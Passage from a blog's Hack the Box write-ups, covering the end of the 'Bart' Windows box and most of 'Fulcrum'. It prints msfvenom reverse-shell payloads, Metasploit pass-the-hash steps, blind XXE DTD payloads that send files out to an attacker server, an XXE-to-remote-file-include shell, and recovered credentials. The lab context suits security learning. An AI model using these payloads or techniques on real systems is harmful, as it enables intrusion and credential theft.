 Volume in drive C has no label.
 Volume Serial Number is F84E-9CF7

 Directory of C:\inetpub\wwwroot\internal-01\log

12/07/2018  04:06    <DIR>          .
12/07/2018  04:06    <DIR>          ..
12/07/2018  04:00               101 log.ph
12/07/2018  04:05             2,643 log.php
12/07/2018  04:01               303 log.txt
21/02/2018  20:44    <DIR>          Microsoft
12/07/2018  04:06            59,392 nc.exe
               4 File(s)         62,439 bytes
               3 Dir(s)  15,505,301,504 bytes free

C:\inetpub\wwwroot\internal-01\log>whoami
nt authority\iusr

Privilege Escalation

Poking around the system you will see that there’s not much going on. It’s a pretty recent build of windows, so that rules a lot of good chunk of kerel-based lpe exploits. Poking around the application folders you discover the password for the mysql database as seen below. You will realize that this was unhelpful information, after attempting to use this password against all the user accounts present on the box.

C:\inetpub\wwwroot\internal-01\simple_chat\includes>type dbconnect.php
...[snip]...
function db_connect() {
        $con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat');
        if ($con === false) {
                return false;
        }

        mysqli_set_charset ($con , 'UTF-8');
        return $con;
}
?>

Getting x64 meterpreter shell & impacket

Lets generate a x64 bit meterpreter payload and make an smb share with impacket

generate payload msfvenom

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.171 LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

impacket-smb share

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.81,49813)
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141

setting up multihandler

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf exploit(multi/handler) > set ExitonSession False
ExitonSession => false
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 10.10.15.171:6969

executting our payload from smb share & getting shell

C:\inetpub\wwwroot\internal-01\log>\\10.10.15.171\kk\6969.exe

session

msf exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 1 opened (10.10.15.171:6969 -> 10.10.10.81:51934) at 2018-07-14 11:44:39 -0400

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART  10.10.15.171:6969 -> 10.10.10.81:51934 (10.10.10.81)

The meterpreter shell will die after some time, as well as the AV on the system will delete your shell after you execute it from the SMB share.

Recovering Administrator AutoLogon Credentials

At this point I did a good chunk of manual enumeration on the system. After manually performing the standard windows priviledge escapation tectures you discover that there are credentials stored in the autologon runkey. Here are a few resources I felt are pretty decent at explaining the things you should look for local windows privilege escalation. Fuzzy Security - Windows Privilege Escalation Fundamentals, Pentestlab, and Daya Privilege Escalation

For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.

It did work with powershell running the following command: Get-ItemProperty -path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"

Since we are already using Metasploit for this box there is a Metasploit post exploitation module called windows_autologin which will extract any autologon credentials from the registry.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set SESSION 7
SESSION => 7
msf post(windows/gather/credentials/windows_autologin) > run

[*] Running against BART on session 7
[+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb
[*] Post module execution completed

Getting System with PTH/PSEXEC

Now that we have the administrators credential getting system should be a snap.

We can perform a Pass the Hash Attack with metasploit’s various psexec modules. We need to add a route to the system so that the module can access the smb port 445 listening locally on the box. This can be achieved with metasploit’s route add command.

msf> use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
SMBPass => 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.15.171\\\kk\\\6969.exe
COMMAND => \\10.10.15.171\kk\6969.exe
msf auxiliary(admin/smb/psexec_command) > set RHOSTS 10.10.10.81
RHOSTS => 10.10.10.81
msf auxiliary(admin/smb/psexec_command) > options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   COMMAND               \\10.10.15.171\kk\6969.exe        yes       The command you want to execute on the remote host
   RHOSTS                10.10.10.81                       yes       The target address range or CIDR identifier
   RPORT                 445                               yes       The Target port
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             .                                 no        The Windows domain to use for authentication
   SMBPass               3130438f31186fbaf962f407711faddb  no        The password for the specified username
   SMBSHARE              C$                                yes       The name of a writeable share on the server
   SMBUser               Administrator                     no        The username to authenticate as
   THREADS               1                                 yes       The number of concurrent threads
   WINPATH               WINDOWS                           yes       The name of the remote Windows directory
msf auxiliary(admin/smb/psexec_command) > route add 10.10.10.81/32 255.255.255.255 7
[*] Route added
msf auxiliary(admin/smb/psexec_command) > run

[+] 10.10.10.81:445       - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.10.81:445       - checking if the file is unlocked
[*] 10.10.10.81:445       - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] 10.10.10.81:445       - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.10.10.81:445       - Getting the command output...
[*] 10.10.10.81:445       - Command finished with no output
[*] 10.10.10.81:445       - Executing cleanup...
[+] 10.10.10.81:445       - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/psexec_command) >
[*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 8 opened (10.10.15.171:6969 -> 10.10.10.81:49866) at 2018-07-14 01:15:57 -0400


msf auxiliary(admin/smb/psexec_command) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  7         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART    10.10.15.171:6969 -> 10.10.10.81:49863 (10.10.10.81)
  8         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BART  10.10.15.171:6969 -> 10.10.10.81:49866 (10.10.10.81)

msf auxiliary(admin/smb/psexec_command) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > sysinfo
Computer        : BART
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

That’s all for now. I’m pretty busy with oscp & work so hopefully the next few boxes are machines I already have writeups completed for. I’ll also update this post on how to complete this box without metasploit after I get some sleep.

Hack the Box - Fulcrum Write up

2018-06-27T00:00:00-04:00

Introduction

Wew this box had aaaaaaaaaalot of steps. Honestly, I feel like a lot of the difficultly perceived with this box came from the heavy need to use powershell. Nonetheless it definitely set the bar of being one of the more in-depth challenges because of all the steps required to reach the end goal. The pivoting was a very nice touch, and I wish there were more hack the box boxes that were architected in this manner with multiple machines or networks. I went a little bit more in-depth with the write-up, and included some fails, and rabbit-hole detection techniques.

Tools Used

Enumeration

Initial Scanning

Like always lets begin with a nmap scan agaisn’t the fulcrum machine (10.10.10.62). You need to run a full portscan to ensure you didn’t miss the service running on port 56423.

root@dastinia:~/htb/fulcrum# nmap -T4 -sV -sC -Pn -p- 10.10.10.62 -oA fulcrum_fullscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-10 15:16 EDT
Nmap scan report for 10.10.10.62
Host is up (0.16s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
4/tcp     open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:28:6e:d0:af:ab:46:de:c5:09:3d:76:ad:5a:44:e0 (RSA)
|   256 c1:5c:1d:ea:99:ec:e0:a1:dc:04:c5:5a:ad:50:36:f6 (ECDSA)
|_  256 a5:2f:44:e6:e3:10:cf:f7:db:15:d1:3f:49:21:3a:7b (ED25519)
80/tcp    open  http    nginx 1.10.3 (Ubuntu)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Input string was not in a correct format.
88/tcp    open  http    nginx 1.10.3 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: phpMyAdmin
9999/tcp  open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Login
56423/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Site doesn't have a title (application/json;charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 775.49 seconds

Enumerating Port 4

Visting the web service on port 4, displays an “Under Maintenance” Page.

Clicking to try again redirects you to /index.php? page=homeLooking at this we might be able to take advantage of a file include (or SSRF) type vulnerability just based on the page parameter. @Jhaddix gave a great talk called “Hunt” at defcon, and to sum it up it’s an analysis of web vulnerabilities, and their most common parameters associated with those vulnerability.” I highly recommend reading/watching the video on the talk because it will help recognize potential vulnberbilites in web applications much quicker.

Running gobuster against the site, reveals us some additional content to explore.

root@dastinia:~/htb/fulcrum# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.62:4 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_fulcrum_4r_fulcrum_4

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.62:4/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 302,307,403,200,204,301
[+] Extensions   : .php,.html
=====================================================
/index.php (Status: 200)
/home.php (Status: 200)
/upload.php (Status: 200)
=====================================================

Going directly to http: //10.10.10.62:4/home.php brings us to the fulcrum file upload page.

Attempting to upload anything using the file upload capability always end up with an error occurring, even while attempting to upload a regular unmodified image file.

We are going to keep a note of this, because it will come in handy later.

Enumerating Port 80

I also ran gobuster in the background. For some reason it’s throwing (fake) IIS errors even though it was a ubuntu server using nginx. You could tell right off the back that this service was fake news, and was likely a rabbit hole so I didn’t spend any resources digging deeper.

Enumering Port 88 (phpmyadmin)

Attempting to authenticate with various combinations of common usernames, and passwords seen on hackthebox machines eg: root:root, admin:admin, admin:password etc..

Every time you attempt to authenticate the following error message would return.

From some quick google searching this likely meant that the MySQL Server is misconfigured, or not accepting connections which likely means this was just another rabbit-hole.

Enumerating Port 9999 (PFSense)

Visiting the service on port 9999 brings us to the homepage of PFsense (an open-source firewall).

Attempting the default credentials for PFsense, in addition to common hack the box username,password combinous resulted with nothing.

You can observe from the footer copyright (which states 2004-2018) this is likely the latest version of PFSense. Another indicator that you can use, if you are familiar with pfsense and how it previously to looked within the past (two? years) they switched the web interface UX styling framework from their (not so pretty custom styling) to bootstrap. If you view the source code of the page, then you see the bootstrap includes, which lets you know that this is likely another rabbit-hole.

Enumerating Port 56423 (FulCrum API)

Visiting the service on Port 56423 brings us to what appears to be some sort of “API” endpoint.

Hitting it with gobuster reveals that, it only has a single resource available for us to hit.

root@dastinia:~/htb/fulcrum# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.62:56423 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_fulcrum_56423

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.62:56423/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 403,200,204,301,302,307
[+] Extensions   : .php,.html
=====================================================
/index.php (Status: 200)

People generally skip over some of the inner thought process of discovering vulerbilities. But in this case, we have no real way of interacting with the api that’s available, so we are likely looking for some sort of blind injection vulnerability. (OS, XPath, XXE, SQLi etc..). We can pretty much rule out an SQL injection because the SQL database from our prior enumeration earlier wasn’t functioning.

After attempting a variety of blind injection attacks, you end up discovering it’s blind XXE vulnerability. The following blog post is a good read on exploiting XXE vulerbilities.

xxe test payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://10.10.14.19:3434/" [
<!ELEMENT data (#PCDATA)>
]>
<data>4</data>

response

root@dastinia:~/htb/fulcrum# ncat -lnkvp 3434
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::3434
Ncat: Listening on 0.0.0.0:3434
Ncat: Connection from 10.10.10.62.
Ncat: Connection from 10.10.10.62:53288.
GET /test-t HTTP/1.0
Host: 10.10.14.19:3434
Connection: close

So we now we know what the vulnerability is, and we have a working “proof of concept”. We can safely say that this is going to be the entry point into the box so now it’s time to dive deeper.

Exploitation

Honestly, this part fucking sucked for me. For some reason I’m awful at either following instructions, or there was something else going on. But one thing’s for sure, I clearly didn’t know how XXE properly which made the following section take forever.

I used a combination of the following resources, finally put together a stable formula for performing the OOB XXE. I’m not 100% if it was intended, but using the php://filter pretty much was a requirement to pull data out through XXE (no other methods seemed to work). If you are just interested in getting the shell, it’s safe to skip this section.

I recommend reading the following resources to understand the different ways we can take advantage of an XXE vulnerability.

Links: | 1 | 2 | | 3

Contents of test.dtd

root@dastinia:~/htb/fulcrum/serve# cat test.dtd
  <!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/issue">
  <!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://10.10.14.128/result?%payl;'>">

Upon successful exploitation, we should be receiving the contents of /etc/issue as a base64 encoded string.

root@dastinia:~/htb/fulcrum/serve# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.62 - - [20/Jun/2018 21:46:50] "GET /test.dtd HTTP/1.0" 200 -
10.10.10.62 - - [20/Jun/2018 21:46:50] code 404, message File not found
10.10.10.62 - - [20/Jun/2018 21:46:50] "GET /result?Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg== HTTP/1.0" 404 -

Decoding it gives us the following content.

$ echo -n "Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg==" | base64 -d
Created by: @OneLogicalMyth
IP Address: \4{ens32}
Hostname:   \n

Good Luck!

By changing the file in test.dtd we can exfiltrate sensitive files, for further analysis, for example the contents of /etc/passwd or the fulcrum api source code.

root:x:0:0:root:/root:/bin/bash
....[snip]....
messagebus:x:108:111::/var/run/dbus:/bin/false
blueprint:x:1000:1000:blueprint,,,:/home/blueprint:/bin/bash
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
libvirt-qemu:x:64055:115:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:110:118:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin

Fulcrum API Source Code

<?php
        header('Content-Type:application/json;charset=utf-8');
        header('Server: Fulcrum-API Beta');
        libxml_disable_entity_loader (false);
        $xmlfile = file_get_contents('php://input');
        $dom = new DOMDocument();
        $dom->loadXML($xmlfile,LIBXML_NOENT|LIBXML_DTDLOAD);
        $input = simplexml_import_dom($dom);
        $output = $input->Ping;
        //check if ok
        if($output == "Ping")
        {
                $data = array('Heartbeat' => array('Ping' => "Ping"));
        }else{
                $data = array('Heartbeat' => array('Ping' => "Pong"));
        }
        echo json_encode($data);


?>

From our further enumeration we know that there are other applications running on this box with known file names (results from enumerating the fulcrum web service on port 4). Attempting to access one of the known files like home.php ends with nothing being returned, so likely what this means that the other web apps are separated into different directories.

Attempting common web directories like www, html, web, upload, uploads you discover that there is web-content being served from the uploads directory which so happens to be the content of the Fulcrum web application service being hosted on port 4.

dtd payload for discovering content in uploads web directory

root@dastinia:~/htb/fulcrum/serve# cat test.dtd  


<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=../uploads/index.php">  
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://10.10.14.128/result?%payl;'>">

results

10.10.10.62 - - [20/Jun/2018 22:32:34] "GET /result?PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK HTTP/1.0" 404 -

Un-Base64’ing the response gives you the contents of index.php

<?php
if($_SERVER['REMOTE_ADDR'] != "127.0.0.1")
{
	echo "<h1>Under Maintance</h1><p>Please <a href=\"http://" . $_SERVER['SERVER_ADDR'] . ":4/index.php?page=home\">try again</a> later.</p>";
}else{
	$inc = $_REQUEST["page"];
	include($inc.".php");
}
?>

Contents of home.php

<?php
?>
<!DOCTYPE html>
<html>
<body>
<h1>Fulcrum File Upload</h1>

<form action="upload.php" method="post" enctype="multipart/form-data">
        Select image to upload:
        <p><input type="file" name="fileToUpload" id="fileToUpload"></p>
        <p><input type="submit" value="Upload Image" name="submit"></p>
</form>

</body>
</html>

Contents of upload.php

<?php
	if(isset($_POST))
	{
		sleep(2);
		echo "<p style=\"color:red;\">Sorry the file upload failed</p>";
	}
?>

We can quickly see see that the code in index.php is vulnerable to a textbook php file inclusion vulnerability. The only thing is, to exploit this vulnerability we need to have the request come from the machines localhost. If you attempt to access the page not from localhost it will give you the Under maintenance page. But if the request comes from localhost we hit the 2nd code path of the application, and we have control over the page parameter which is getting passed directly into the include statement which we can use to get code execution. Additional Reading

Getting Shell via Remote File Include

For what it was worth, getting a shell was relatively simple to execute. You probably could have skipped all of the stuff in the middle section, and gone straight here if you are familiar with php web application vulnerabilities, and what they look like. I believe a lot of people who completed this box did just that.

generating a regular msfvenom php reverse shell

root@dastinia:~/htb/fulcrum/serve# msfvenom -p php/reverse_php LHOST=10.10.15.74 LPORT=443 -f raw > 443.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 3036 bytes

You are going to need to serve your payload with some sort of webserver. A python3 http.server is a quick way to throw up a webserver to host content.

setting up python http.server

root@dastinia:~/htb/fulcrum/serve# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Setting up metasploit multi handler to catch shell

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > set ExitOnSession False
ExitOnSession => false
msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.15.74:443

Now all we need to do is to use our XXE vulnerability to craft a URL to fetch our payload to exploit the file include.

raw request in burpsuite for exploiting the XXE to php file-include

GET / HTTP/1.1

Host: 10.10.10.62:56423
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 131


<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://127.0.0.1:4/index.php?page=http://10.10.15.74/443">

%remote; %intern; %xxe;

]>

Sweet got a shell, but getting a shell is only the beginning…

getting a shell after successful exploitation

msf exploit(multi/handler) > [*] Command shell session 1 opened (10.10.15.74:443 -> 10.10.10.62:47692) at 2018-06-21 22:09:31 -0400

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/uploads
ls -la
total 24
drwxr-xr-x 2 root root 4096 Oct  5  2017 .
drwxr-xr-x 6 root root 4096 Oct  5  2017 ..
-rw-r--r-- 1 root root  714 Oct  4  2017 Fulcrum_Upload_to_Corp.ps1
-rw-r--r-- 1 root root  321 Oct  4  2017 home.php
-rw-r--r-- 1 root root  255 Oct  5  2017 index.php
-rw-r--r-- 1 root root  113 Oct  4  2017 upload.php

This shell is extremely unstable & will die after a few minutes, so I recommend throwing yourself a regular socat/netcat shell.

Pivoting

Decrypting/Recovering Credentials in Script for PSRemoting

Interestly we discover that there is a powershell script on the box, this is pretty unusual because this machine is labelled as a Linux system.

Contents of Fulcrum_Upload_to_Corp.ps1

# TODO: Forward the PowerShell remoting port to the external interface
# Password is now encrypted \o/

$1 = 'WebUser'
$2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','
$3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA='
$4 = $3 | ConvertTo-SecureString -key $2
$5 = New-Object System.Management.Automation.PSCredential ($1, $4)

Invoke-Command -Computer upload.fulcrum.local -Credential $5 -File Data.ps1

We can modify the script slightly so that it decrypts the password for us.

decrypt.ps1

$1 = 'WebUser'
$2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','
$3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA='
$4 = $3 | ConvertTo-SecureString -key $2
[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR($4))

Password of WebUser

PS C:\> .\decrypt.ps1
M4ng£m£ntPa55
PS C:\>

Discovering 192.168.122.x Network

After decrypting the password, the next step was to search for additional containers, virtual machines, or connected networks.

Running an ifconfig we see this machine has many interfaces, which is extremely usual for a Hack the Box machine. A network address that stands our is 192.168.122.1 which is very strange. Likely this machine is dual-homed.

ifconfig output

www-data@Fulcrum:~$ ifconfig
corp      Link encap:Ethernet  HWaddr 52:54:00:87:ee:c0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:412 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:32601 (32.6 KB)  TX bytes:0 (0.0 B)

ens32     Link encap:Ethernet  HWaddr 00:50:56:b9:44:f1
          inet addr:10.10.10.62  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:44f1/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:44f1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:72492 errors:0 dropped:82 overruns:0 frame:0
          TX packets:35844 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11175820 (11.1 MB)  TX bytes:5982295 (5.9 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:241 errors:0 dropped:0 overruns:0 frame:0
          TX packets:241 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:18409 (18.4 KB)  TX bytes:18409 (18.4 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:9c:e7:10
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:53053 errors:0 dropped:0 overruns:0 frame:0
          TX packets:50375 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3317157 (3.3 MB)  TX bytes:2463028 (2.4 MB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:32:d7:13
          inet6 addr: fe80::fc54:ff:fe32:d713/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4904 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16218 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:493632 (493.6 KB)  TX bytes:1118993 (1.1 MB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:74:9d:17
          inet6 addr: fe80::fc54:ff:fe74:9d17/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:53053 errors:0 dropped:0 overruns:0 frame:0
          TX packets:61628 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4059899 (4.0 MB)  TX bytes:3048416 (3.0 MB)

vnet2     Link encap:Ethernet  HWaddr fe:54:00:32:59:e0
          inet6 addr: fe80::fc54:ff:fe32:59e0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6321 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18278 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:599472 (599.4 KB)  TX bytes:2537511 (2.5 MB)

vnet3     Link encap:Ethernet  HWaddr fe:54:00:82:69:f5
          inet6 addr: fe80::fc54:ff:fe82:69f5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3146 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:244122 (244.1 KB)  TX bytes:915975 (915.9 KB)

vnet4     Link encap:Ethernet  HWaddr fe:54:00:01:c6:b8
          inet6 addr: fe80::fc54:ff:fe01:c6b8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7031 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17564 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1952435 (1.9 MB)  TX bytes:1184340 (1.1 MB)

vnet5     Link encap:Ethernet  HWaddr fe:54:00:8f:b9:f9
          inet6 addr: fe80::fc54:ff:fe8f:b9f9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1821 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12593 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:289587 (289.5 KB)  TX bytes:785970 (785.9 KB)

web       Link encap:Ethernet  HWaddr 52:54:00:15:08:7e
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:583 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:65505 (65.5 KB)  TX bytes:0 (0.0 B)

To reduce our scope a bit, we can check the arp table, and see which machines that this machine has talked to recently.

www-data@Fulcrum:~$ arp -a

? (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens32
